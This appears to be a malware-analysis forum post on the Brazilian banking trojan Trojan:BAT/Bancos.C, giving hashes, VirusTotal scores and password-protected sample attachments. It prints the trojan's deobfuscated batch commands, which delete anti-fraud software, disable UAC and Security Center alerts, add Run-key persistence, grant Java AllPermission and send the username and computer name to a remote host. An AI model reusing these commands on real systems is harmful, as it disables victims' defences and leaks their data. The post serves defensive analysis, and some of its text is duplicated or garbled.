Trojan:BAT/Bancos.C
SHA1: 6ad1feb9c700166dfc95f26ce6ca56633f9b7afc
MD5: bf3d246f192438279bec871feb4966d0
Under RarSFX + UPX.
Main payload in .bat script with obfuscated strings (rsrc section of unpacked).
Removes files:
Some strings
dropper: 27 /42 https://www.virustotal.com/file/23a65ea ... /analysis/
unpacked: 10 / 40 https://www.virustotal.com/file/6cbb3a2 ... 342175161/
malicious batch script: 4 / 41 https://www.virustotal.com/file/47d9eb5 ... 342174705/
SHA1: 6ad1feb9c700166dfc95f26ce6ca56633f9b7afc
MD5: bf3d246f192438279bec871feb4966d0
Under RarSFX + UPX.
Main payload in .bat script with obfuscated strings (rsrc section of unpacked).
Removes files:
del /f /q "%windir%\system32\scpVista.exe"By googling I found that files belong to anti-malware/anti-fraud product of Brazilian company - Scopus Tecnologia.
del /f /q "%windir%\system32\scpLIB.dll"
del /f /q "%windir%\system32\scpMIB.dll"
del /f /q "%windir%\system32\scpsssh2.dll"
del /f /q "%ProgramFiles%\Scpad\scpLIB.dll"
del /f /q "%ProgramFiles%\Scpad\scpMIB.dll"
del /f /q "%ProgramFiles%\Scpad\scpsssh2.dll"
del /f /q "%ProgramFiles%\Scpad\scpIBCfg.bin"
Some strings
Overwrite?Also can run IE and redirect user to special host:
Please enter the password.
Bitte w
hlen Sie einen Ordner zum Speichern der Dateien aus.
Fehler!
An unknown error occured. The program will be terminated.
\BDFINOPS
Error!
This program is not supported on this operating system.
open
berschreiben?
Fortfahren?
Continue?
The file
Einige Include Dateien konnten nicht erstellt werden.
Nicht gen
gend Speicher verf
gbar.
Ein unbekannter Fehler ist aufgetreten. Das Programm wird beendet.
Can not create some of your include files.
Password
Passwort
Falsches Passwort.
Can not allocate the memory.
existiert bereits im aktuellen Arbeitsverzeichnis.
berschreiben?
Das Programm wird von diesem Betriebssytem nicht unterst
tzt.
Choose a location to save the files.
Wrong password.
Die Datei
Bitte geben Sie das Passwort ein.
deutsch
already exists in the current directory. Overwrite?
start /low /min iexplore.exe "http://!_a_!/agoravai.php?a=%username%&b=%computername%")&&fsutil file createnew "%temp%\thunb.db" 666"Deobfuscated string has view:
http://redir.updateflashplayer.com.br/a ... mputername%"Disables security center:
%windir%\system32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /fVMware detection code.
%windir%\system32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Microsoft Installer" /t REG_SZ /d "%temp%\_msimsn.exe" /f
%windir%\system32\reg.exe add "HKLM\Software\Microsoft\Security Center" /v AntiVirusDisableNotify /t REG_DWORD /d 0x00000001 /f
%windir%\system32\reg.exe add "HKLM\Software\Microsoft\Security Center" /v FirewallDisableNotify /t REG_DWORD /d 0x00000001 /f
%windir%\system32\reg.exe add "HKLM\Software\Microsoft\Security Center" /v UpdatesDisableNotify /t REG_DWORD /d 0x00000001 /f
%windir%\system32\reg.exe add "HAheAEa_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v DisableSR /t REG_DWORD /d 0x00000001 /f
REM @ipconfig /all|find "VMware"&&if errorlevel 0 exitMakes some Java-enabled settings.
set java=permission java.security.AllPermission...of course epic detection
for /f "tokens=*" %%E IN ('dir /b /s ^| find /i "java.policy"') DO echo grant { %java%;}; > "%%E"
dropper: 27 /42 https://www.virustotal.com/file/23a65ea ... /analysis/
unpacked: 10 / 40 https://www.virustotal.com/file/6cbb3a2 ... 342175161/
malicious batch script: 4 / 41 https://www.virustotal.com/file/47d9eb5 ... 342174705/
Attachments
pass:infected
(1.61 KiB) Downloaded 54 times
(1.61 KiB) Downloaded 54 times
pass:infected
(20.22 KiB) Downloaded 47 times
(20.22 KiB) Downloaded 47 times
pass:infected
(75.32 KiB) Downloaded 55 times
(75.32 KiB) Downloaded 55 times
